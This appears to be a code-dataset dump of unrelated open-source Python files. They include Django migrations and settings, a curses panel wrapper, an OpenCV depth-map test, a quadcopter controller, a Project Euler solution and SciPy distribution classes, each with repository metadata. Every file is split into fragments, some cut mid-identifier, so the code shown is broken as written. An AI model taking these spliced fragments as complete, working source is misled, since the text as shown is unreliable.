('opportunity', models.ForeignKey(to='crm.Opportunity')),
],
),
migrations.CreateModel(
name='Reminder',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('date', models.DateField()),
('note', models.CharField(max_length=200)),
('completed', models.BooleanField(default=False)),
('opportunity', models.ForeignKey(to='crm.Opportunity')),
],
),
migrations.CreateModel(
name='Report',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=200)),
('link', models.URLField()),
],
),
migrations.CreateModel(
name='Stage',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=200)),
('order', models.IntegerField(help_text=b'The order this is displayed on the screen')),
('description', models.TextField(null=True, blank=True)),
('value', models.IntegerField(help_text=b'On a scale of 0 to 100 of the stage of the pipeline')),
],
),
migrations.AddField(
model_name='opportunitystage',
name='stage',
field=models.ForeignKey(to='crm.Stage'),
),
migrations.AddField(
model_name='opportunitystage',
name='user',
field=models.ForeignKey(to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='opportunity',
name='stage',
field=models.ForeignKey(to='crm.Stage'),
),
migrations.AddField(
model_name='opportunity',
name='user',
field=models.ForeignKey(to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='calllog',
name='opportunity',
field=models.ForeignKey(to='crm.Opportunity'),
),
migrations.AddField(
model_name='calllog',
name='user',
field=models.ForeignKey(to=settings.AUTH_USER_MODEL),
),
]
|
MehmetNuri/ozgurlukicin
|
scripts/kargo/main.py
|
Python
|
gpl-3.0
| 1,129
| 0.004429
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import locale
import os
import sys
from datetime import date
from kargoxml import add_column
script_dir = os.path.split(os.path.abspath(os.path.dirname(__file__)))[0]
project_dir = os.path.split(script_dir)[0]
sys.path.append(project_dir)
sys.path.append(os.path.split(project_dir)[0])
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
from oi.shipit.models import CdClient
from oi.shipit.models import PardusVersion
from django.template.defaultfilters import slugify
if __name__ == '__main__':
args = sys.argv
pardus_versions = PardusVersion.objects.all()
if len(args) != 2:
print("Usage: python %s [limit]") % __file__
sys.exit()
try:
limit = int(args[-1])
except ValueError:
print("Invalid limit: %s") % args[-1]
sys.exit()
#locale.setlocale(locale.LC_ALL, "tr_TR.UTF-8")
for version in pardus_versions:
cdclient = CdClient.object
|
s.fil
|
ter(confirmed=1,
sent=0, taken=0, version=version).order_by('date')[:limit]
add_column(cdclient, date.today().isoformat(), slugify(version))
|
shadow/shadow-ctl
|
src/panel.py
|
Python
|
gpl-3.0
| 41,934
| 0.005032
|
"""
Wrapper for safely working with curses subwindows.
Based on code from the arm project, developed by Damian Johnson under GPLv3
(www.atagar.com - [email protected])
"""
import os
import copy
import time
import curses
import curses.ascii
import curses.textpad
from threading import RLock
from multiprocessing import Queue
from input import *
from tools import *
# global ui lock governing all panel instances (curses isn't thread save and
# concurrency bugs produce especially sinister glitches)
CURSES_LOCK = RLock()
# tags used by addfstr - this maps to functor/argument combinations since the
# actual values (in the case of color attributes) might not yet be initialized
def _noOp(arg): return arg
FORMAT_TAGS = {"<b>": (_noOp, curses.A_BOLD),
"<u>": (_noOp, curses.A_UNDERLINE),
"<h>": (_noOp, curses.A_STANDOUT)}
for colorLabel in COLOR_LIST: FORMAT_TAGS["<%s>" % colorLabel] = (getColor, colorLabel)
# prevents curses redraws if set
HALT_ACTIVITY = False
OptionResult = Enum("BACK", "NEXT")
class Panel():
"""
Wrapper for curses subwindows. This hides most of the ugliness in common
curses operations including:
- locking when concurrently drawing to multiple windows
- gracefully handle terminal resizing
- clip text that falls outside the panel
- convenience methods for word wrap, in-line formatting, etc
This uses a design akin to Swing where panel instances provide their display
implementation by overwriting the draw() method, and are redrawn with
redraw().
"""
def __init__(self, parent, name, top, left=0, height= -1, width= -1):
"""
Creates a durable wrapper for a curses subwindow in the given parent.
Arguments:
parent - parent curses window
name - identifier for the panel
top - positioning of top within parent
left - positioning of the left edge within the parent
height - maximum height of panel (uses all available space if -1)
width - maximum width of panel (uses all available space if -1)
"""
# The not-so-pythonic getters for these parameters are because some
# implementations aren't entirely deterministic (for instance panels
# might chose their height based on its parent's current width).
self.panelName = name
self.parent = parent
self.visible = False
self.titleVisible = True
# Attributes for pausing. The pauseAttr contains variables our getAttr
# method is tracking, and the pause buffer has copies of the values from
# when we were last unpaused (unused unless we're paused).
self.paused = False
self.pauseAttr = []
self.pauseBuffer = {}
self.pauseTime = -1
self.top = top
self.left = left
self.height = height
self.width = width
# The panel's subwindow instance. This is made available to implementors
# via their draw method and shouldn't be accessed directly.
#
# This is None if either the subwindow failed to be created or needs to be
# remade before it's used. The later could be for a couple reasons:
# - The subwindow was never initialized.
# - Any of the parameters used for subwindow initialization have changed.
self.win = None
self.maxY, self.maxX = -1, -1 # subwindow dimensions when last redrawn
def getName(self):
"""
Provides panel's identifier.
"""
return self.panelName
def isTitleVisible(self):
"""
True if the title is configured to be visible, False otherwise.
"""
return self.titleVisible
def setTitleVisible(self, isVisible):
"""
Configures the panel's title to be visible or not when it's next redrawn.
This is not guarenteed to be respected (not all panels have a title).
"""
self.titleVisible = isVisible
def getParent(self):
"""
Provides the parent used to create subwindows.
"""
return self.parent
def setParent(self, parent):
"""
Changes the parent used to create subwindows.
Arguments:
parent - parent curses window
"""
if self.parent != parent:
self.parent = parent
self.win = None
def isVisible(self):
"""
Provides if the panel's configured to be visible or not.
"""
return self.visible
def setVisible(self, isVisible):
"""
Toggles if the panel is visible or not.
Arguments:
isVisible - panel is redrawn when requested if true, skipped otherwise
"""
self.visible = isVisible
def isPaused(self):
"""
Provides if the panel's configured to be paused or not.
"""
return self.paused
def setPauseAttr(self, attr):
"""
Configures the panel to track the given attribute so that getAttr provides
the value when it was last unpaused (or its current value if we're
currently unpaused). For instance...
> self.setPauseAttr("myVar")
> self.myVar = 5
> self.myVar = 6 # self.getAttr("myVar") -> 6
> self.setPaused(True)
> self.myVar = 7 # self.getAttr("myVar") -> 6
> self.setPaused(False)
> self.myVar = 7 # self.getAttr("myVar") -> 7
Arguments:
attr - parameter to be tracked for getAttr
"""
self.pauseAttr.append(attr)
self.pauseBuffer[attr] = self.copyAttr(attr)
def getAttr(self, attr):
"""
Provides the value of the given attribute when we were last unpaused. If
we're currently unpaused then this is the current value. If untracked this
returns None.
Arguments:
attr - local variable to be returned
"""
if not attr in self.pauseAttr: return None
elif self.paused: return self.pauseBuffer[attr]
else: return self.__dict__.get(attr)
def copyAttr(self, attr):
"""
Provides a duplicate of the given configuration value, suitable for the
pause buffer.
Arguments:
attr - parameter to be provided back
"""
currentValue = self.__dict__.get(attr)
return copy.copy(currentValue)
def setPaused(self, isPause, suppressRedraw=False):
"""
Toggles if the panel is paused or not. This causes the panel to be redrawn
when toggling is pause state unless told to do otherwise. This is
important when pausing since otherwise the panel's display could change
when redrawn for other reasons.
This returns True if the panel's pause state was changed, False otherwise.
Arguments:
isPause - freezes the state of the pause attributes if true, makes
them editable otherwise
suppressRedraw - if true then this will never redraw the panel
"""
if isPause != self.paused:
if isPause: self.pauseTime = time.time()
self.paused = isPause
if isPause:
# copies tracked attributes so we know what they were before pausing
for attr in self.pauseAttr:
|
self.pauseBuffer[attr] = self.copyAttr(attr)
if not suppressRedraw: self.redraw(True)
return True
else
|
: return False
def getPauseTime(self):
"""
Provides the time that we were last paused, returning -1 if we've never
been paused.
"""
return self.pauseTime
def getTop(self):
"""
Provides the position subwindows are placed at within its parent.
"""
return self.top
def setTop(self, top):
"""
Changes the position where subwindows are placed within its parent.
Arguments:
top - positioning of top within parent
"""
if self.top != top:
self.top = top
self.win = None
def getLeft(se
|
Sid1057/obstacle_detector
|
depth_test.py
|
Python
|
mit
| 3,465
| 0.002886
|
#!/usr/bin/python3
import numpy as np
import cv2
from collections import deque
from obstacle_detector.distance_calculator import spline_dist
from obstacle_detector.perspective import inv_persp_new
from obstacle_detector.perspective import regress_perspecive
from obstacle_detector.depth_mapper import calculate_depth_map
from obstacle_detector.tm.image_shift_calculator import find_shift_value
def video_test(input_video_path=None, output_video_path=None):
cx = 595
cy = 303
roi_width = 25
roi_length = 90
cap = cv2.VideoCapture(
input_video_path \
if input_video_path is not None \
else input('enter video path: '))
old_images = deque()
original_frames = deque()
ret, frame = cap.read()
for i in range(15):
original_frames.append(frame)
img, pts1 = inv_persp_new(
frame, (cx, cy), (roi_width, roi_length), spline_dist, 200)
old_images.append(img)
ret, f
|
rame = cap.read()
height, width, _ = frame.shape
out_height, out_width, _ = img.shape
fourcc = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter(
output_video_path \
if output_video_path is not None \
else 'output.avi',
fourcc, 15.0, (out_width * 4, out_height))
left = cv2.imread('aloeL.jpg')
right = cv2.imread('aloeR.jpg')
while(ret):
original_frames.popleft()
re
|
t, frame = cap.read()
original_frames.append(frame)
img, pts1 = inv_persp_new(
frame, (cx, cy), (roi_width, roi_length), spline_dist, 200)
old_images.popleft()
old_images.append(img)
left = original_frames[-5][:, width // 2:]
right = original_frames[-1][:, width // 2:]
left = cv2.pyrDown(left)
left = cv2.blur(left, (3, 3))
right = cv2.pyrDown(right)
right = cv2.blur(right, (3, 3))
depth = calculate_depth_map(left, right)
cv2.imshow('left', left)
cv2.imshow('right', right)
cv2.imshow('depth', depth)
depth = cv2.cvtColor(depth, cv2.COLOR_GRAY2BGR)
res = cv2.addWeighted(left, 0.5, depth, 0.5, 0)
cv2.imshow('res', res)
# left = old_images[-1][300:,:]
# right = old_images[-9][300:,:]
#
# shift_value = find_shift_value(left, right, (30, 100, 60, 300))
# right = np.roll(right, shift_value[1], axis=0)#shift_value[0])
# right = np.roll(right, shift_value[0], axis=1)#shift_value[0])
# left = left[100:-100,:]
# right = right[100:-100,:]
#
# print(shift_value)
#
# left = np.rot90(left, 3)
# right = np.rot90(right, 3)
#
# cv2.imshow('left', left)
# cv2.imshow('right', right)
#
# shifted_map = cv2.equalizeHist(
# calculate_depth_map(
# left, right))
# cv2.imshow(
# 'shifted map', shifted_map)
# diff = cv2.absdiff(left, right)
# cv2.imshow('diff', diff)
# dm = calculate_depth_map(left, right)
# cv2.imshow('dm', dm)
# dm = cv2.equalizeHist(dm)
# cv2.imshow('eq dm', dm)
# dm = cv2.cvtColor(dm, cv2.COLOR_GRAY2BGR)
k = cv2.waitKey(1) & 0xff
if k == 27:
break
elif k == ord('s'):
cv2.imwrite('screen.png', img)
cap.release()
out.release()
cv2.destroyAllWindows()
video_test('../../video/6.mp4', '../results/depth_map_out.avi')
|
DeltaEpsilon-HackFMI2/FMICalendar-REST
|
venv/lib/python2.7/site-packages/rest_framework/settings.py
|
Python
|
mit
| 6,264
| 0.000319
|
"""
Settings for REST framework are all namespaced in the REST_FRAMEWORK setting.
For example your project's `settings.py` file might look like this:
REST_FRAMEWORK = {
'DEFAULT_RENDERER_CLASSES': (
'rest_framework.renderers.JSONRenderer',
'rest_framework.renderers.YAMLRenderer',
)
'DEFAULT_PARSER_CLASSES': (
'rest_framework.parsers.JSONParser',
'rest_framework.parsers.YAMLParser',
)
}
This module provides the `api_setting` object, that is used to access
REST framework settings, checking for user settings first, then falling
back to the defaults.
"""
from __future__ import unicode_literals
from django.conf import settings
from django.utils import importlib
from rest_framework import ISO_8601
from rest_framework.compat import six
USER_SETTINGS = getattr(settings, 'REST_FRAMEWORK', None)
DEFAULTS = {
# Base API policies
'DEFAULT_RENDERER_CLASSES': (
'rest_framework.renderers.JSONRenderer',
'rest_framework.renderers.BrowsableAPIRenderer',
),
'DEFAULT_PARSER_CLASSES': (
'rest_framework.parsers.JSONParser',
'rest_framework.parsers.FormParser',
'rest_framework.parsers.MultiPartParser'
),
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.SessionAuthentication',
'rest_framework.authentication.BasicAuthentication'
),
'DEFAULT_PERMISSION_CLASSES': (
'rest_framework.permissions.AllowAny',
),
'DEFAULT_THROTTLE_CLASSES': (
),
'DEFAULT_CONTENT_NEGOTIATION_CLASS':
'rest_framework.negotiation.DefaultContentNegotiation',
# Genric view behavior
'DEFAULT_MODEL_SERIALIZER_CLASS':
'rest_framework.serializers.ModelSerializer',
'DEFAULT_PAGINATION_SERIALIZER_CLASS':
'rest_framework.pagination.PaginationSerializer',
'DEFAULT_FILTER_BACKENDS': (),
# Throttling
'DEFAULT_THROTTLE_RATES': {
'user': None,
'anon': None,
},
# Pagination
'PAGINATE_BY': None,
'PAGINATE_BY_PARAM': None,
'MAX_PAGINATE_BY': None,
# Authentication
'UNAUTHENTICATED_USER': 'django.contrib.auth.models.AnonymousUser',
'UNAUTHENTICATED_TOKEN': None,
# View configuration
'VIEW_NAME_FUNCTION': 'rest_framework.views.get_view_name',
'VIEW_DESCRIPTION_FUNCTION': 'rest_framework.views.get_view_description',
# Exception handling
'EXCEPTION_HANDLER': 'rest_framework.views.exception_handler',
# Testing
'TEST_REQUEST_RENDERER_CLASSES': (
'rest_framework.renderers.MultiPartRenderer',
'rest_framework.renderers.JSONRenderer'
),
'TEST_REQUEST_DEFAULT_FORMAT': 'multipart',
# Browser enhancements
'FORM_METHOD_OVERRIDE': '_method',
'FORM_CONTENT_OVERRIDE': '_content',
'FORM_CONTENTTYPE_OVERRIDE': '_content_type',
'URL_ACCEPT_OVERRIDE': 'accept',
'URL_FORMAT_OVERRIDE': 'format',
'FORMAT_SUFFIX_KWARG': 'format',
# Input and output formats
'DATE_INPUT_FORMATS': (
ISO_8601,
),
'DATE_FORMAT': None,
'DATETIME_INPUT_FORMATS': (
ISO_8601,
),
'DATETIME_FORMAT': None,
'TIME_INPUT_FORMATS': (
ISO_8601,
),
'TIME_FORMAT': None,
# Pending deprecation
'FILTER_BACKEND': None,
}
# List of settings that may be in string import notation.
IMPORT_STRINGS = (
'DEFAULT_RENDERER_CLASSES',
'DEFAULT_PARSER_CLASSES',
'DEFAULT_AUTHENTICATION_CLASSES',
'DEFAULT_PERMISSION_CLASSES',
'DEFAULT_THROTTLE_CLASSES',
'DEFAULT_CONTENT_NEGOTIATION_CLASS',
'DEFAULT_MODEL_SERIALIZER_CLASS',
'DEFAULT_PAGINATION_SERIALIZER_CLASS',
'DEFAULT_FILTER_BACKENDS',
'EXCEPTION_HANDLER',
'FILTER_BACKEND',
'TEST_REQUEST_RENDERER_CLASSES',
'UNAUTHENTICATED_USER',
'UNAUTHENTICATED_TOKEN',
'VIEW_NAME_FUNCTION',
'VIEW_DESCRIPTION_FUNCTION'
)
def perform_import(val, setting_name):
"""
If the given setting is a string import notation,
then perform the necessary import or imports.
"""
if isinstance(val, six.string_types):
return import_from_string(val, setting_name)
elif isinstance(val, (list, tuple)):
return [import_from_string(item, setting_name) for item in val]
return val
def import_from_string(val, setting_name):
"""
Attempt to import a class from a string representation.
"""
try:
# Nod to tastypie's use of importlib.
parts = val.split('.')
module_path, class_name = '.'.join(parts[:-1]), parts[-1]
module = importlib.import_module(module_path)
return getattr(module, class_name)
except ImportError as e:
msg = "Could not import '%s' for API setting '%s'. %s: %s." % (val, setting_name, e.__class__.__name__, e)
raise ImportError(msg)
class APISettings(object):
"""
A settings object, that allows API settings to be accessed as properties.
For example:
from rest_framework.settings import api_settings
print api_settings.DEFAULT_RENDERER_CLASSES
Any setting with string import paths will be automatically resolved
and return the class, rather than the string literal.
"""
def __init__(self, user_settings=None, defaults=None, import_strings=None):
self.user_set
|
tings = user_settings or {
|
}
self.defaults = defaults or {}
self.import_strings = import_strings or ()
def __getattr__(self, attr):
if attr not in self.defaults.keys():
raise AttributeError("Invalid API setting: '%s'" % attr)
try:
# Check if present in user settings
val = self.user_settings[attr]
except KeyError:
# Fall back to defaults
val = self.defaults[attr]
# Coerce import strings into classes
if val and attr in self.import_strings:
val = perform_import(val, attr)
self.validate_setting(attr, val)
# Cache the result
setattr(self, attr, val)
return val
def validate_setting(self, attr, val):
if attr == 'FILTER_BACKEND' and val is not None:
# Make sure we can initialize the class
val()
api_settings = APISettings(USER_SETTINGS, DEFAULTS, IMPORT_STRINGS)
|
NewsNerdsAtCoJMC/ProjectTicoTeam6
|
service/volunteers/migrations/0002_auto_20170314_1712.py
|
Python
|
mit
| 424
| 0
|
# -*-
|
coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-03-14 17:12
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('volunteers', '0001_initial'),
]
operations = [
migrations.RenameField(
model_name='volunteer',
old_name='picture',
new_name='avatar',
),
|
]
|
ivanprjcts/equinox-spring16-API
|
equinox_spring16_api/equinox_spring16_api/urls.py
|
Python
|
lgpl-3.0
| 1,431
| 0.000699
|
"""equinox_spring16_api URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.8/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Add an import: from blog import urls as blog_urls
2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))
"""
from django.conf.urls import include, url
from django.conf.urls.static import static
from django.contrib import admin
from rest_fram
|
ework import routers
from equinox_api.views import ApplicationViewSet, OperationViewSet, InstancesViewSet, UserViewSet, ItemViewSet
from equinox_spring16_api import settings
router = routers.DefaultRouter()
router.register(r'applications', ApplicationViewSet)
router.register(r'operations', OperationViewSet)
router.register(r'instances', InstancesViewSet)
router.register(r'items', ItemViewSet)
router.register(r'users', UserViewSet)
urlpatterns = [
url(r'^admin/', include(admin.site.urls))
|
,
url(r'^', include(router.urls)),
url(r'^docs/', include('rest_framework_swagger.urls')),
] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
|
ychab/privagal
|
privagal/gallery/tests/test_factories.py
|
Python
|
bsd-3-clause
| 584
| 0
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from privagal.core.utils import PrivagalTestCase
from ...gal
|
lery.factories import GalleryFactory, ImageFact
|
ory
class GalleryFactoryTestCase(PrivagalTestCase):
def test_images_given(self):
image = ImageFactory()
gallery = GalleryFactory(images__images=[image])
self.timeline.add_child(instance=gallery)
self.assertEqual(gallery.images.first().image, image)
def test_images_default(self):
gallery = GalleryFactory()
self.assertEqual(gallery.images.count(), 3)
|
mwalzer/Ligandomat
|
ligandomat/run_list_handling.py
|
Python
|
mit
| 2,262
| 0.07206
|
from sqlalchemy import and_
from DBtransfer import *
from zlib import *
#retrun compressed
def generateFromDB(DBSession, InternData, tmp_name) :
run_list=[]
user_data = DBSession.query(InternData).filter(InternData.timestamp == tmp_name)
for data in user_data :
if not data.run in run_list :
run_list.append(data.run)
return compressList(run_list)
def getknown_runsAndrun_list(DBSession, Mass_specData, InternData, tmp_name) : #CR: rename to splitKnownAndTodo
#~ knownRuns = [] # devide runs from upload into known runs (in DB) ...
#~ runList = [] #...and the usual run_list, to get data from these runs
#CR:
runs_in_upload = decompressList(generateFromDB(DBSession, InternData, tmp_name))
#~ known_runs = [x for x in DBSession.query(Mass_specData.filename).all() if x in runs_in_upload]
known_runs = [x.filename for x in DBSession.query(Mass_specData).filter(Mass_specData.filename.i
|
n_(runs_in_upload))]
run_list = [x for x in runs_in_upload if x not in known_runs]
#~ allRuns = getAllRuns_Filename(DBSession, Mass_specData)# in DB saved runs
#~ decomruns_in_upload = decompressList(runs_in_upload)
#~ for run in decomruns_in_upload :
#~ if run in allRuns :
#~ knownRuns.append(run)
#~ else :
#~ runList.append(run)
return (known_runs, run_list)
#input compressed
#output not compress
|
ed
def usedRuns(run_list, params) :
list_of_used_runs = []
runs = decompressList(run_list)
for i in range(0, len(runs)) :
if runs[i] in params :
list_of_used_runs.append(runs[i])
return list_of_used_runs
# input not compressed
# output InternData objects
def rowsToFill(DBSession, InternData, tmp_name, used_runs) :
users_rows = getUserRows(DBSession, InternData, tmp_name)
rows = []
for row in users_rows :
if row.run in used_runs :
rows.append(row)
return rows
#input compressed, not compressed
def throughOutUsedRuns(run_list, used_runs) : # not compressed
rl = decompressList(run_list)
for run in used_runs :
rl.pop(rl.index(run))
if len(rl) > 0 :
return compressList(rl)
else :
return []
#
def compressList(list) :
return compress('$$'.join(list))
#input compressed
def decompressList(run_list) :
return decompress(run_list).split('$$')
|
riscmaster/risc_maap
|
risc_control/src/IRIS_DF_Controller.py
|
Python
|
bsd-2-clause
| 6,110
| 0.022913
|
#!/usr/bin/env python
'''======================================================
Created by: D. Spencer Maughan
Last updated: May 2015
File name: IRIS_DF_Controller.py
Organization: RISC Lab, Utah State University
Notes:
======================================================'''
import roslib; roslib.load_manifest('risc_msgs')
import rospy
from math import *
import numpy as np
import time
#=======================#
# Messages Needed #
#=======================#
from risc_msgs.msg import *
from std_msgs.msg import Bool
from roscopter.msg import Status
#=====================#
# Gain Matrices #
#=====================#
K = np.matrix([[ 1.8, 0, 0, 1.4, 0, 0, 0],\
[ 0, 1.8, 0, 0, 1.4, 0, 0],\
[ 0, 0, 3, 0, 0, 5, 0],\
[ 0, 0, 0, 0, 0, 0,.5]])
#========================#
# Globals #
#========================#
nominal_thrust = 0 # thrust necessary to maintain hover given battery level
phi_scale = 3.053261127645355
phi_trim = 0.0#0.058941904209906
theta_scale = 3.815398742249453
theta_trim = 0.0#-0.091216767651723
ctrl_status = False
states = Cortex()
states.Obj = [States()]*1
traj = Trajectories()
traj.Obj = [Trajectory()]*1
euler_max = 45*np.pi/180
max_yaw_rate = .3490659 #in radians/sec
rate = 45 # Hz
image = 0
start_time = 0
#==================#
# Publishers #
#==================#
pub_ctrl = rospy.Publisher('/controls', Controls, queue_size = 1)
#========================#
# Get Cortex States #
#========================#
def GetStates(S):
global states
states = S
#=====================#
# Get Trajectory #
#=====================#
def GetTraj(S):
global traj
traj = S
#=========================#
# Get Battery Status #
#=========================#
def GetBatt(S):
global nominal_thrust
B = S.battery_remaining
# coefficients for fourth order fit
# determined 11 May 2015 by Spencer Maughan and Ishmaal Erekson
c0 = 0.491674747062374
c1 = -0.024809293286468
c2 = 0.000662710609466
c3 = -0.000008160593348
c4 = 0.000000033699651
nominal_thrust = c0+c1*B+c2*B**2+c3*B**3+c4*B**4
#============================#
# Get Controller Status #
#============================#
def GetStatus(S):
global ctrl_status
ctrl_status = S.data
#========================#
# Basic Controller #
#========================#
def Basic_Controller():
global states, euler_max, max_yaw_rate, pub_ctrl,K,traj
Ctrl = Controls()
Ctrl.Obj = [Control()]*1
Ctrl.header.stamp = states.header.stamp
g = 9.80665 # average value of earth's gravitational constant m/s^2
m = 1.282 # IRIS mass in kg
#===================================#
# Get State Trajectory Errors #
#===================================#
if states.Obj[0].visible:
X = np.asmatrix(np.zeros((7,1)))
X[0] = traj.Obj[0].x-states.Obj[0].x
X[1] = traj.Obj[0].y-states.Obj[0].y
X[2] = traj.Obj[0].z-states.Obj[0].z
X[3] = traj.Obj[0].xdot-states.Obj[0].u
X[4] = traj.Obj[0].ydot-states.Obj[0].v
X[5] = traj.Obj[0].zdot-states.Obj[0].w
X[6] = traj.Obj[0].psi-states.Obj[0].psi*np.pi/180
#============================================#
# Differential Flatness Control Input #
#============================================#
# LQR input
utilde = -K*X
# required input
u_r = np.asmatrix(np.zeros((4,1)))
u = utilde+u_r-np.matrix([[0],[0],[9.81],[0]])
#==================================#
# Rotate to Vehicle 1 Frame #
#==================================#
psi = states.Obj[0].psi*np.pi/180
rotZ = np.matrix([[cos(psi), sin(psi), 0],[-sin(psi), cos(psi), 0],[0, 0, 1]])
Cart = np.matrix([[1, 0, 0],[0, -1, 0],[0, 0, -1]])
u[:-1] = Cart*rotZ*u[:-1]
#===================================#
# Normalize given the Thrust #
#===================================#
T = sqrt(u[0:3].T*u[0:3])
u[:-1] = np.divide(u[:-1],-T)
#==================#
# Set Controls #
#==================#
# Controls for Ardrone
# -phi = right... +phi = left
# -theta = back... +theta = forward
# -psi = right... +psi = left
global phi_trim,theta_trim,phi_scale,theta_scale
phi_d = (asin(u[1,-1]))
theta_d = (-asin(u[0,-1]))
ctrl = Control()
ctrl.name = states.Obj[0].name
ctrl.phi = phi_trim + phi_scale*phi_d
ctrl.theta = theta_trim + theta_scale*theta_d
ctrl.psi = -u[3,-1]/max_yaw_rate
global nominal_thrust
T_d = nominal_thrust+(T-g)/g
ctrl.T = T_d
Ctrl.Obj[0] = ctrl
Ctrl.header = states.header
#rospy.loginfo("latency = %f",states.header.stamp.to_sec()-rospy.get_time())
pub_ctrl.publish(Ctrl)
#===================#
# Main #
#===================#
if __name__=='__main__':
import sys
rospy.init_node('IRIS_DF_Controller')
#=====================================#
# Set up Publish/Subscribe Loop #
#=====================================#
r = rospy.Rate(rate)
while not rospy.is_shutdown():
sub_cortex = rospy.Subscriber('/cortex_raw' , Cortex, GetStates, queue_size=1, buff_size=2**24)
sub_traj = rospy.Subscriber('/trajectory' , Tra
|
jectories, GetTraj, queue_size=1, buff_size=2**24)
sub_Batt
|
= rospy.Subscriber('/apm/status' , Status, GetBatt)
sub_status = rospy.Subscriber('/controller_status' , Bool, GetStatus)
Basic_Controller()
r.sleep()
|
DestructHub/ProjectEuler
|
Problem030/Python/solution_1.py
|
Python
|
mit
| 1,884
| 0.010144
|
#!/usr/bin/env python
# coding=utf-8
# Python Script
#
# Copyleft © Manoel Vilela
#
#
from functools import reduce
"""
Digit fifth powers
Problem 30
Surprisingly there are only three numbers that can be written as the sum of fourth powers of their digits:
1634 = 1^4 + 6^4 + 3^4 + 4^4
8208 = 8^4 + 2^4 + 0^4 + 8^4
9474 = 9^4 + 4^4 + 7^4 + 4^4
As 1 = 14 is not a sum it is not included.
The sum of these numbers is 1634 + 820
|
8 + 9474 = 19316.
Find the sum of all the numbers that can be written as the sum of fifth powers of their digits.
"""
""" Prova de um cara lá no fórum do PE sobre apenas ser necessário considerar números de 6 dígitos ou menos.
Proof that one need only consider
|
numbers 6 digits or less:
If N has n digits, then 10^{n-1} <= N.
If N is the sum of the 5th powers of its digits, N <= n*9^5. Thus, 10^{n-1} <= n*9^5.
We now show by induction that if n>=7, then 10^{n-6} > n.
1) Basis step (n=7): 10^{7-6} = 10 > 7.
2) Induction step: suppose 10^{n-6} > n for some n>=7. Show this true for n+1 too. Well,
10^{(n+1)-6} = 10*10^{n-6} > 10n > 2n > n+1
QED.
It follows that if n>=7, then
10^{n-1} = 10^{n-6}*10^5 > n * 10^5 > n*9^5.
Hence the only way we can have 10^{n-1} <= n*9^5 is for n<=6.
"""
# Aqui foi pura sorte.
# Inicialmente tentei pensar num limite para testes, seria o tamanho*9**5, mas não consegui deduzir o maior tamanho possível
# Desse jeito, fiz alguns testes e descobri que a ocorrência de números que poderiam ser escritos como a soma de potência(5)
# Era no tamanho intervalo de [4, 7)
from itertools import combinations_with_replacement as c; from string import digits as d
n = lambda num, digits: sorted(str(num)) == sorted(digits)
p = lambda comb: sum([int(n) ** 5 for n in comb])
print(sum(set(reduce(list.__add__, ([p(cb) for cb in c(d, x) if n(p(cb), cb)] for x in range(7))))))
|
gertingold/scipy
|
scipy/stats/_continuous_distns.py
|
Python
|
bsd-3-clause
| 220,936
| 0.000751
|
# -*- coding: utf-8 -*-
#
# Author: Travis Oliphant 2002-2011 with contributions from
# SciPy Developers 2004-2011
#
from __future__ import division, print_function, absolute_import
import warnings
import numpy as np
from scipy._lib.doccer import (extend_notes_in_docstring,
replace_notes_in_docstring)
from scipy import optimize
from scipy import integrate
from scipy import interpolate
import scipy.special as sc
import scipy.special._ufuncs as scu
from scipy._lib._numpy_compat import broadcast_to
from scipy._lib._util import _lazyselect, _lazywhere
from . import _stats
from ._tukeylambda_stats import (tukeylambda_variance as _tlvar,
tukeylambda_kurtosis as _tlkurt)
from ._distn_infrastructure import (get_distribution_names, _kurtosis,
_ncx2_cdf, _ncx2_log_pdf, _ncx2_pdf,
rv_continuous, _skew, valarray,
_get_fixed_fit_value)
from ._constants import _XMIN, _EULER, _ZETA3, _XMAX, _LOGXMAX
# In numpy 1.12 and above, np.power refuses to raise integers to negative
# powers, and `np.float_power` is a new replacement.
try:
float_power = np.float_power
except AttributeError:
float_power = np.power
def _remove_optimizer_parameters(kwds):
"""
Remove the optimizer-related keyword arguments 'loc', 'scale' and
'optimizer' from `kwds`. Then check that `kwds` is empty, and
raise `TypeError("Unknown arguments: %s." % kwds)` if it is not.
This function is used in the fit method of distributions that override
the default method and do not use the default optimization code.
`kwds` is modified in-place.
"""
kwds.pop('loc', None)
kwds.pop('scale', None)
kwds.pop('optimizer', None)
if kwds:
raise TypeError("Unknown arguments: %s." % kwds)
## Kolmogorov-Smirnov one-sided and two-sided test statistics
class ksone_gen(rv_continuous):
r"""General Kolmogorov-Smirnov one-sided test.
This is the distribution of the one-sided Kolmogorov-Smirnov (KS)
statistics :math:`D_n^+` and :math:`D_n^-`
for a finite sample size ``n`` (the shape parameter).
%(before_notes)s
Notes
-----
:math:`D_n^+` and :math:`D_n^-` are given by
.. math::
D_n^+ &= \text{sup}_x (F_n(x) - F(x)),\\
D_n^- &= \text{sup}_x (F(x) - F_n(x)),\\
where :math:`F` is a CDF and :math:`F_n` is an empirical CDF. `ksone`
describes the distribution under the null hypothesis of the KS test
that the empirical CDF corresponds to :math:`n` i.i.d. random variates
with CDF :math:`F`.
%(after_notes)s
See Also
--------
kstwobign, kstest
References
----------
.. [1] Birnbaum, Z. W. and Tingey, F.H. "One-sided confidence contours
for probability distribution functions", The Annals of Mathematical
Statistics, 22(4), pp 592-596 (1951).
%(example)s
"""
def _pdf(self, x, n):
return -scu._smirnovp(n, x)
def _cdf(self, x, n):
return scu._smirnovc(n, x)
